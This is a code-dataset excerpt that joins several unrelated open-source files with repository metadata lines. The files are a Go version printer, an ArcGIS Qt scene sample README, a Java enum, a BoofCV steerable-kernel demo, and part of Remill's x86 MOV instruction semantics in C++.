return []string{
fmt.Sprintf("API Version: %s", apiVersion),
fmt.Sprintf("Version: %s", Version),
fmt.Sprintf("Git SHA: %s", GitSHA),
fmt.Sprintf("Built At: %s", Built),
fmt.Sprintf("Go Version: %s", runtime.Version()),
fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH),
}
}
| k82cn/kube-arbitrator | pkg/version/version.go | GO | apache-2.0 | 1,456 |
# Display a scene
Display a scene with a terrain surface and some imagery.

## Use case
Scene views are 3D representations of real-world areas and objects. Scene views are helpful for visualizing complex datasets where 3D relationships, topography, and elevation of elements are important factors.
## How to use the sample
When loaded, the sample will display a scene. Pan and zoom to explore the scene.
## How it works
1. Create a `Scene` object with a `BasemapImageryWithLabels` basemap.
2. Create an `ArcGISTiledElevationSource` object and add it to the scene's base surface.
3. Create a `SceneView` object to display the scene.
4. Set the scene to the scene view.
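For reference, here is a minimal QML sketch of these steps (the type names and import version are assumptions based on the ArcGIS Runtime 100.x QML API; the URL is the standard World Elevation 3D terrain service):
```qml
import QtQuick 2.6
import Esri.ArcGISRuntime 100.5
SceneView {
    anchors.fill: parent
    Scene {
        // Step 1: imagery-with-labels basemap
        BasemapImageryWithLabels {}
        // Step 2: terrain surface backed by a tiled elevation source
        Surface {
            ArcGISTiledElevationSource {
                url: "https://elevation3d.arcgis.com/arcgis/rest/services/WorldElevation3D/Terrain3D/ImageServer"
            }
        }
    }
    // Steps 3 and 4: declaring the Scene inside the SceneView displays it.
}
```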
## Relevant API
* ArcGISTiledElevationSource
* Scene
* SceneView
## Tags
3D, basemap, elevation, scene, surface
| Esri/arcgis-runtime-samples-qt | ArcGISRuntimeSDKQt_QMLSamples/Scenes/BasicSceneView/README.md | Markdown | apache-2.0 | 819 |
package no.dusken.momus.model.websocket;
public enum Action {
CREATE, UPDATE, DELETE
} | Studentmediene/Momus | src/main/java/no/dusken/momus/model/websocket/Action.java | Java | apache-2.0 | 91 |
/*
* Copyright (c) 2021, Peter Abeles. All Rights Reserved.
*
* This file is part of BoofCV (http://boofcv.org).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package boofcv.demonstrations.imageprocessing;
import boofcv.abst.distort.FDistort;
import boofcv.alg.filter.kernel.GKernelMath;
import boofcv.alg.filter.kernel.SteerableKernel;
import boofcv.alg.misc.GImageStatistics;
import boofcv.core.image.GeneralizedImageOps;
import boofcv.gui.ListDisplayPanel;
import boofcv.gui.SelectAlgorithmPanel;
import boofcv.gui.image.VisualizeImageData;
import boofcv.struct.convolve.Kernel2D;
import boofcv.struct.image.ImageGray;
import javax.swing.*;
import java.awt.*;
import java.awt.image.BufferedImage;
import java.util.ArrayList;
import java.util.List;
/**
* Visualizes steerable kernels.
*
* @author Peter Abeles
*/
public abstract class DisplaySteerableBase<T extends ImageGray<T>, K extends Kernel2D>
extends SelectAlgorithmPanel {
protected static int imageSize = 400;
protected static int radius = 100;
protected Class<T> imageType;
protected Class<K> kernelType;
ListDisplayPanel basisPanel = new ListDisplayPanel();
ListDisplayPanel steerPanel = new ListDisplayPanel();
T largeImg;
List<DisplayGaussianKernelApp.DerivType> order = new ArrayList<>();
protected DisplaySteerableBase( Class<T> imageType, Class<K> kernelType ) {
this.imageType = imageType;
this.kernelType = kernelType;
largeImg = GeneralizedImageOps.createSingleBand(imageType, imageSize, imageSize);
addAlgorithm("Deriv X", new DisplayGaussianKernelApp.DerivType(1, 0));
addAlgorithm("Deriv XX", new DisplayGaussianKernelApp.DerivType(2, 0));
addAlgorithm("Deriv XXX", new DisplayGaussianKernelApp.DerivType(3, 0));
addAlgorithm("Deriv XXXX", new DisplayGaussianKernelApp.DerivType(4, 0));
addAlgorithm("Deriv XY", new DisplayGaussianKernelApp.DerivType(1, 1));
addAlgorithm("Deriv XXY", new DisplayGaussianKernelApp.DerivType(2, 1));
addAlgorithm("Deriv XYY", new DisplayGaussianKernelApp.DerivType(1, 2));
addAlgorithm("Deriv XXXY", new DisplayGaussianKernelApp.DerivType(3, 1));
addAlgorithm("Deriv XXYY", new DisplayGaussianKernelApp.DerivType(2, 2));
addAlgorithm("Deriv XYYY", new DisplayGaussianKernelApp.DerivType(1, 3));
JPanel content = new JPanel(new GridLayout(0, 2));
content.add(basisPanel);
content.add(steerPanel);
setMainGUI(content);
}
protected abstract SteerableKernel<K> createKernel( int orderX, int orderY );
@Override
public void setActiveAlgorithm( String name, Object cookie ) {
DisplayGaussianKernelApp.DerivType dt = (DisplayGaussianKernelApp.DerivType)cookie;
// add basis
SteerableKernel<K> steerable = createKernel(dt.orderX, dt.orderY);
basisPanel.reset();
for (int i = 0; i < steerable.getBasisSize(); i++) {
T smallImg = GKernelMath.convertToImage(steerable.getBasis(i));
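			// Enlarge the kernel image with nearest-neighbor interpolation so individual taps stay visible.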
new FDistort(smallImg, largeImg).scaleExt().interpNN().apply();
double maxValue = GImageStatistics.maxAbs(largeImg);
BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue);
basisPanel.addImage(out, "Basis " + i);
}
// add steered kernels
steerPanel.reset();
for (int i = 0; i <= 20; i++) {
double angle = Math.PI*i/20.0;
K kernel = steerable.compute(angle);
T smallImg = GKernelMath.convertToImage(kernel);
new FDistort(smallImg, largeImg).scaleExt().interpNN().apply();
double maxValue = GImageStatistics.maxAbs(largeImg);
BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue);
steerPanel.addImage(out, String.format("%5d", (int)(180.0*angle/Math.PI)));
}
repaint();
}
}
| lessthanoptimal/BoofCV | demonstrations/src/main/java/boofcv/demonstrations/imageprocessing/DisplaySteerableBase.java | Java | apache-2.0 | 4,148 |
/*
* Copyright (c) 2017 Trail of Bits, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
namespace {
template <typename D, typename S>
DEF_SEM(MOV, D dst, const S src) {
WriteZExt(dst, Read(src));
return memory;
}
template <typename D1, typename S1, typename D2, typename S2>
DEF_SEM(XCHG, D1 dst, S1 dst_val, D2 src, S2 src_val) {
auto old_dst = Read(dst_val);
auto old_src = Read(src_val);
WriteZExt(dst, old_src);
WriteZExt(src, old_dst);
return memory;
}
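// MOVBE: move data with the byte order reversed (endianness swap on load/store).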
template <typename D, typename S>
DEF_SEM(MOVBE16, D dst, const S src) {
WriteZExt(dst, __builtin_bswap16(Read(src)));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVBE32, D dst, const S src) {
WriteZExt(dst, __builtin_bswap32(Read(src)));
return memory;
}
#if 64 == ADDRESS_SIZE_BITS
template <typename D, typename S>
DEF_SEM(MOVBE64, D dst, const S src) {
Write(dst, __builtin_bswap64(Read(src)));
return memory;
}
#endif
template <typename D, typename S>
DEF_SEM(MOVQ, D dst, S src) {
UWriteV64(dst, UExtractV64(UReadV64(src), 0));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVD, D dst, S src) {
UWriteV32(dst, UExtractV32(UReadV32(src), 0));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVxPS, D dst, S src) {
FWriteV32(dst, FReadV32(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVxPD, D dst, S src) {
FWriteV64(dst, FReadV64(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVDQx, D dst, S src) {
UWriteV128(dst, UReadV128(src));
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVLPS, D dst, S src) {
auto src_vec = FReadV32(src);
auto low1 = FExtractV32(src_vec, 0);
auto low2 = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(FReadV32(dst), 0, low1), 1, low2));
return memory;
}
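// MOVLHPS: copy the low two floats of src into the high half of dst.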
DEF_SEM(MOVLHPS, V128W dst, V128 src) {
auto res = FReadV32(dst);
auto src1 = FReadV32(src);
res = FInsertV32(res, 2, FExtractV32(src1, 0));
res = FInsertV32(res, 3, FExtractV32(src1, 1));
FWriteV32(dst, res);
return memory;
}
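// MOVHLPS: copy the high two floats of src into the low half of dst.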
DEF_SEM(MOVHLPS, V128W dst, V128 src) {
auto res = FReadV32(dst);
auto src1 = FReadV32(src);
res = FInsertV32(res, 0, FExtractV32(src1, 2));
res = FInsertV32(res, 1, FExtractV32(src1, 3));
FWriteV32(dst, res);
return memory;
}
template <typename D, typename S>
DEF_SEM(MOVLPD, D dst, S src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVLPS, VV128W dst, V128 src1, MV64 src2) {
auto low_vec = FReadV32(src2);
FWriteV32(
dst, FInsertV32(FInsertV32(FReadV32(src1), 0, FExtractV32(low_vec, 0)), 1,
FExtractV32(low_vec, 1)));
return memory;
}
DEF_SEM(VMOVLPD, VV128W dst, V128 src1, MV64 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src1), 0, FExtractV64(FReadV64(src2), 0)));
return memory;
}
DEF_SEM(VMOVLHPS, VV128W dst, V128 src1, V128 src2) {
/* DEST[63:0] ← SRC1[63:0] */
/* DEST[127:64] ← SRC2[63:0] */
/* DEST[VLMAX-1:128] ← 0 */
auto src1_vec = FReadV32(src1);
auto src2_vec = FReadV32(src2);
float32v4_t temp_vec = {};
temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src1_vec, 0));
temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src1_vec, 1));
temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src2_vec, 0));
temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src2_vec, 1));
FWriteV32(dst, temp_vec);
return memory;
}
DEF_SEM(VMOVHLPS, VV128W dst, V128 src1, V128 src2) {
auto src1_vec = FReadV32(src1);
auto src2_vec = FReadV32(src2);
float32v4_t temp_vec = {};
temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src2_vec, 2));
temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src2_vec, 3));
temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src1_vec, 2));
temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src1_vec, 3));
FWriteV32(dst, temp_vec);
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
// Fused `CALL $0; POP reg` sequences.
DEF_ISEL(CALL_POP_FUSED_32) = MOV<R32W, I32>;
DEF_ISEL(CALL_POP_FUSED_64) = MOV<R64W, I64>;
DEF_ISEL(MOV_GPR8_IMMb_C6r0) = MOV<R8W, I8>;
DEF_ISEL(MOV_MEMb_IMMb) = MOV<M8W, I8>;
DEF_ISEL_RnW_In(MOV_GPRv_IMMz, MOV);
DEF_ISEL_MnW_In(MOV_MEMv_IMMz, MOV);
DEF_ISEL(MOVBE_GPRv_MEMv_16) = MOVBE16<R16W, M16>;
DEF_ISEL(MOVBE_GPRv_MEMv_32) = MOVBE32<R32W, M32>;
IF_64BIT(DEF_ISEL(MOVBE_GPRv_MEMv_64) = MOVBE64<R64W, M64>;)
DEF_ISEL(MOV_GPR8_GPR8_88) = MOV<R8W, R8>;
DEF_ISEL(MOV_MEMb_GPR8) = MOV<M8W, R8>;
DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv, MOV);
DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_89, MOV);
DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_8B, MOV);
DEF_ISEL(MOV_GPR8_MEMb) = MOV<R8W, M8>;
DEF_ISEL(MOV_GPR8_GPR8_8A) = MOV<R8W, R8>;
DEF_ISEL_RnW_Mn(MOV_GPRv_MEMv, MOV);
DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv_8B, MOV);
DEF_ISEL(MOV_AL_MEMb) = MOV<R8W, M8>;
DEF_ISEL_RnW_Mn(MOV_OrAX_MEMv, MOV);
DEF_ISEL(MOV_MEMb_AL) = MOV<M8W, R8>;
DEF_ISEL_MnW_Rn(MOV_MEMv_OrAX, MOV);
DEF_ISEL(MOV_GPR8_IMMb_D0) = MOV<R8W, I8>;
DEF_ISEL(MOV_GPR8_IMMb_B0) =
MOV<R8W, I8>; // https://github.com/intelxed/xed/commit/906d25
DEF_ISEL_RnW_In(MOV_GPRv_IMMv, MOV);
DEF_ISEL(MOVNTI_MEMd_GPR32) = MOV<M32W, R32>;
IF_64BIT(DEF_ISEL(MOVNTI_MEMq_GPR64) = MOV<M64W, R64>;)
DEF_ISEL(XCHG_MEMb_GPR8) = XCHG<M8W, M8, R8W, R8>;
DEF_ISEL(XCHG_GPR8_GPR8) = XCHG<R8W, R8, R8W, R8>;
DEF_ISEL_MnW_Mn_RnW_Rn(XCHG_MEMv_GPRv, XCHG);
DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_GPRv, XCHG);
DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_OrAX, XCHG);
DEF_ISEL(MOVQ_MMXq_MEMq_0F6E) = MOVQ<V64W, MV64>;
DEF_ISEL(MOVQ_MMXq_GPR64) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MEMq_MMXq_0F7E) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_GPR64_MMXq) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MMXq_MEMq_0F6F) = MOVQ<V64W, MV64>;
DEF_ISEL(MOVQ_MMXq_MMXq_0F6F) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_MEMq_MMXq_0F7F) = MOVQ<MV64W, V64>;
DEF_ISEL(MOVQ_MMXq_MMXq_0F7F) = MOVQ<V64W, V64>;
DEF_ISEL(MOVQ_XMMdq_MEMq_0F6E) = MOVQ<V128W, MV64>;
IF_64BIT(DEF_ISEL(MOVQ_XMMdq_GPR64) = MOVQ<V128W, V64>;)
DEF_ISEL(MOVQ_MEMq_XMMq_0F7E) = MOVQ<MV64W, V128>;
IF_64BIT(DEF_ISEL(MOVQ_GPR64_XMMq) = MOVQ<V64W, V128>;)
DEF_ISEL(MOVQ_MEMq_XMMq_0FD6) = MOVQ<MV64W, V128>;
DEF_ISEL(MOVQ_XMMdq_XMMq_0FD6) = MOVQ<V128W, V128>;
DEF_ISEL(MOVQ_XMMdq_MEMq_0F7E) = MOVQ<V128W, MV64>;
DEF_ISEL(MOVQ_XMMdq_XMMq_0F7E) = MOVQ<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVQ_XMMdq_MEMq_6E) = MOVQ<VV128W, MV64>;
IF_64BIT(DEF_ISEL(VMOVQ_XMMdq_GPR64q) = MOVQ<VV128W, V64>;)
DEF_ISEL(VMOVQ_MEMq_XMMq_7E) = MOVQ<MV64W, V128>;
IF_64BIT(DEF_ISEL(VMOVQ_GPR64q_XMMq) = MOVQ<V64W, V128>;)
DEF_ISEL(VMOVQ_XMMdq_MEMq_7E) = MOVQ<VV128W, MV64>;
DEF_ISEL(VMOVQ_XMMdq_XMMq_7E) = MOVQ<VV128W, V128>;
DEF_ISEL(VMOVQ_MEMq_XMMq_D6) = MOVQ<MV64W, V128>;
DEF_ISEL(VMOVQ_XMMdq_XMMq_D6) = MOVQ<VV128W, V128>;
# if HAS_FEATURE_AVX512
DEF_ISEL(VMOVQ_XMMu64_MEMu64_AVX512) = MOVQ<VV128W, MV64>;
IF_64BIT(DEF_ISEL(VMOVQ_GPR64u64_XMMu64_AVX512) = MOVQ<V64W, V128>;)
IF_64BIT(DEF_ISEL(VMOVQ_XMMu64_GPR64u64_AVX512) = MOVQ<VV128W, V64>;)
DEF_ISEL(VMOVQ_XMMu64_XMMu64_AVX512) = MOVQ<VV128W, V128>;
DEF_ISEL(VMOVQ_MEMu64_XMMu64_AVX512) = MOVQ<MV64W, V128>;
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVD_MMXq_MEMd) = MOVD<V32W, MV32>;
DEF_ISEL(MOVD_MMXq_GPR32) = MOVD<V32W, V32>;
DEF_ISEL(MOVD_MEMd_MMXd) = MOVD<MV32W, V32>;
DEF_ISEL(MOVD_GPR32_MMXd) = MOVD<V32W, V32>;
DEF_ISEL(MOVD_XMMdq_MEMd) = MOVD<V128W, MV32>;
DEF_ISEL(MOVD_XMMdq_GPR32) = MOVD<V128W, V32>; // Zero extends.
DEF_ISEL(MOVD_MEMd_XMMd) = MOVD<MV32W, V128>;
DEF_ISEL(MOVD_GPR32_XMMd) = MOVD<V32W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVD_XMMdq_MEMd) = MOVD<VV128W, MV32>;
DEF_ISEL(VMOVD_XMMdq_GPR32d) = MOVD<VV128W, V32>;
DEF_ISEL(VMOVD_MEMd_XMMd) = MOVD<MV32W, V128>;
DEF_ISEL(VMOVD_GPR32d_XMMd) = MOVD<V32W, V128>;
# if HAS_FEATURE_AVX512
DEF_ISEL(VMOVD_XMMu32_MEMu32_AVX512) = MOVD<VV128W, MV32>;
DEF_ISEL(VMOVD_XMMu32_GPR32u32_AVX512) = MOVD<VV128W, V32>;
DEF_ISEL(VMOVD_MEMu32_XMMu32_AVX512) = MOVD<MV32W, V128>;
DEF_ISEL(VMOVD_GPR32u32_XMMu32_AVX512) = MOVD<V32W, V128>;
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVAPS_XMMps_MEMps) = MOVxPS<V128W, MV128>;
DEF_ISEL(MOVAPS_XMMps_XMMps_0F28) = MOVxPS<V128W, V128>;
DEF_ISEL(MOVAPS_MEMps_XMMps) = MOVxPS<MV128W, V128>;
DEF_ISEL(MOVAPS_XMMps_XMMps_0F29) = MOVxPS<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVAPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>;
DEF_ISEL(VMOVAPS_XMMdq_XMMdq_28) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVAPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVAPS_XMMdq_XMMdq_29) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVAPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>;
DEF_ISEL(VMOVAPS_YMMqq_YMMqq_28) = MOVxPS<VV256W, VV256>;
DEF_ISEL(VMOVAPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
DEF_ISEL(VMOVAPS_YMMqq_YMMqq_29) = MOVxPS<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4102 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4103 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4104 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4105 VMOVAPS VMOVAPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4106 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4107 VMOVAPS VMOVAPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4108 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4109 VMOVAPS VMOVAPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4110 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4111 VMOVAPS VMOVAPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//4112 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4113 VMOVAPS VMOVAPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTPS_MEMdq_XMMps) = MOVxPS<MV128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVNTPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
# if HAS_FEATURE_AVX512
//6168 VMOVNTPS VMOVNTPS_MEMf32_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6169 VMOVNTPS VMOVNTPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6170 VMOVNTPS VMOVNTPS_MEMf32_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVUPS_XMMps_MEMps) = MOVxPS<V128W, MV128>;
DEF_ISEL(MOVUPS_XMMps_XMMps_0F10) = MOVxPS<V128W, V128>;
DEF_ISEL(MOVUPS_MEMps_XMMps) = MOVxPS<MV128W, V128>;
DEF_ISEL(MOVUPS_XMMps_XMMps_0F11) = MOVxPS<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVUPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>;
DEF_ISEL(VMOVUPS_XMMdq_XMMdq_10) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVUPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>;
DEF_ISEL(VMOVUPS_XMMdq_XMMdq_11) = MOVxPS<VV128W, VV128>;
DEF_ISEL(VMOVUPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>;
DEF_ISEL(VMOVUPS_YMMqq_YMMqq_10) = MOVxPS<VV256W, VV256>;
DEF_ISEL(VMOVUPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>;
DEF_ISEL(VMOVUPS_YMMqq_YMMqq_11) = MOVxPS<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4954 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4955 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4956 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4957 VMOVUPS VMOVUPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4958 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4959 VMOVUPS VMOVUPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4960 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4961 VMOVUPS VMOVUPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4962 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4963 VMOVUPS VMOVUPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4964 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//4965 VMOVUPS VMOVUPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVAPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>;
DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F28) = MOVxPD<V128W, V128>;
DEF_ISEL(MOVAPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>;
DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F29) = MOVxPD<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVAPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>;
DEF_ISEL(VMOVAPD_XMMdq_XMMdq_28) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVAPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVAPD_XMMdq_XMMdq_29) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVAPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>;
DEF_ISEL(VMOVAPD_YMMqq_YMMqq_28) = MOVxPD<VV256W, VV256>;
DEF_ISEL(VMOVAPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
DEF_ISEL(VMOVAPD_YMMqq_YMMqq_29) = MOVxPD<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//5585 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//5586 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5587 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//5588 VMOVAPD VMOVAPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5589 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//5590 VMOVAPD VMOVAPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5591 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
